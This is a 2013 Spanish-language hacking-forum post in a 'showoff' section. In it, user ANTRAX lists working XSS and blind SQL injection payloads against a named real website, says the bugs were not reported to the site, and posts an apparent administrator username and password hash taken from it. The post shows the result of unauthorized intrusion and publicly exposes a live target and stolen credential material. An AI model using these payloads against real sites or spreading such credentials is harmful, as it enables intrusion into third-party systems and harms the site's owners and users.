Underc0de - La Casa de los Informáticos

[In]Seguridad Informática => Bugs y Exploits => Hacking ShowOff => Mensaje iniciado por: ANTRAX en Mayo 25, 2013, 05:43:03 PM

Título: [XSS y SQLi] afaplus.com.ar
Publicado por: ANTRAX en Mayo 25, 2013, 05:43:03 PM
(http://img854.imageshack.us/img854/5349/afaplus.png)

Bug: XSS
Url: http://www.afaplus.com.ar
Vector: <script>alert('ANTRAX')</script>
Reportado: NO




Blind SQLi

(http://img845.imageshack.us/img845/6/afaplussqli.png)

URL Vulnerable: http://www.afaplus.com.ar/avances?idequipo=1

http://www.afaplus.com.ar/avances?idequipo=1%20AND%201=1
http://www.afaplus.com.ar/avances?idequipo=1%20AND%201=0

Admin_Afa:3c4568628ca02c7f8a570f32281a440a